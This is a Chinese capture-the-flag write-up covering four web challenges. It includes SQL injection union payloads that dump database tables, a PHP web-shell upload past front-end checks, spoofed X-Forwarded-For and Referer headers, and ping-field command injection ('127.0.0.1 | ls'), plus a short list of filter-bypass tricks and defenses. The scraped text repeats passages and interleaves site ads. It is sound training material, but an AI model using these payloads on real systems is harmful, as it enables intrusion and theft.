
一:Newscenter
打开页面如下所示。

经过尝试,得知在输入框中输入数字可得到不同内容。

输入 23 就没有新闻。

由此推断输入框与数据库有交互,该题考察 SQL 注入。
发现将数据库中所有查询了出来,确认考察点为 SQL 注入。

字段长度为 3。
23' order by 3 #

回显字段有 2, 3。
23' union select 1,2,3 #

数据库名为 news。
通过四个攻防世界 Web 题目演示常见漏洞利用方法。包括 Newscenter 的 SQL 注入(联合查询获取数据库信息)、upload1 的文件上传绕过(前端验证失效)、Xff_referer 的 HTTP 头伪造(IP 与来源限制绕过)以及 Command_execution 的命令注入(直接拼接系统命令)。总结部分详细解析了各漏洞的考察点、解题思路、关键技术及防御建议,强调使用预编译语句、白名单机制及安全 API 的重要性。


打开页面如下所示。

经过尝试,得知在输入框中输入数字可得到不同内容。

输入 23 就没有新闻。

由此推断输入框与数据库有交互,该题考察 SQL 注入。
发现将数据库中所有查询了出来,确认考察点为 SQL 注入。

字段长度为 3。
23' order by 3 #

回显字段有 2, 3。
23' union select 1,2,3 #

数据库名为 news。

微信公众号「极客日志」,在微信中扫描左侧二维码关注。展示文案:极客日志 zeeklog
使用加密算法(如AES、TripleDES、Rabbit或RC4)加密和解密文本明文。 在线工具,加密/解密文本在线工具,online
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML转Markdown 互为补充。 在线工具,Markdown转HTML在线工具,online
将 HTML 片段转为 GitHub Flavored Markdown,支持标题、列表、链接、代码块与表格等;浏览器内处理,可链接预填。 在线工具,HTML转Markdown在线工具,online
通过删除不必要的空白来缩小和压缩JSON。 在线工具,JSON 压缩在线工具,online

表名如下。
23' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="news" #

根据表名查到列名。
23' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="secret_table" #

成功拿到 flag。
23' union select 1,fl4g,3 from secret_table #

发现有提示框提示需要上传图片,说明是前端验证。

关闭提示框后上传一张 php 文件即可。


使用蚁剑连接即可成功拿到 flag。

打开提示 IP 必须为 123.123.123.123,需伪造 IP 头即 X-Forwarded-For 字段。

打开 BP 进行抓包,输入 X-Forwarded-For:123.123.123.123 进行伪造。
发送后又提示来源为 google,来源字段是 Referer。

伪造 Referer 字段。

打开发现为 ping 功能,先随便 ping 一下看看能否查看其他数据。

Ping 127.0.0.1 发现可以,填写 payload:127.0.0.1 | ls。

成功执行 ls,说明没有任何过滤。接下来查找 flag。

执行 127.0.0.1 |find / -name "fl*"。
发现文件如下。

成功拿到 flag。

考察点
解题思路
',观察是否存在报错。ORDER BY 确定查询字段数(如 ' ORDER BY 3--)。' UNION SELECT 1,2,database()-- 获取数据库名。information_schema.tables)、列名,最终读取 flag 字段。关键技术
information_schema 数据库获取元数据。防御建议
考察点
解题思路
.php,并抓包修改 Content-Type 为 image/jpeg。.htaccess 文件设置解析规则。关键技术
up.php.phtml)。test.php.xxx)。防御建议
考察点
X-Forwarded-For(XFF)和 Referer 头绕过访问控制。解题思路
X-Forwarded-For: 127.0.0.1 伪装本地 IP。Referer 为题目指定域名(如 http://www.google.com)通过验证。关键技术
防御建议
考察点
解题思路
127.0.0.1; ls 尝试执行命令。${IFS} 或 %09(Tab 的 URL 编码)。ca\t 或 base64 编码命令。cat 或 tac 命令读取 flag 文件。关键技术
;、&、|、||。cat fla*。防御建议
subprocess 模块)替代直接执行命令。